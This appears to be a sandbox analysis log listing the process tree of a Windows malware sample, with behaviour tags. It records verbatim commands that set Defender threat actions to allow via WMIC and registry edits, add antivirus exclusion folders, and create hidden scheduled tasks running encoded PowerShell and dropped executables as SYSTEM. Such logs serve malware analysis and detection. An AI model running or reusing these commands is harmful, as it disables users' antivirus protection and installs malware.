C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:324⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grUXVILUo" /SC once /ST 10:05:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grUXVILUo"3⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grUXVILUo"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YqJChhYnTMHzkMjCc" /SC once /ST 13:53:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\ncZxzUl.exe\" lA /site_id 394347 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YqJChhYnTMHzkMjCc"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\ncZxzUl.exeC:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\ncZxzUl.exe lA /site_id 394347 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
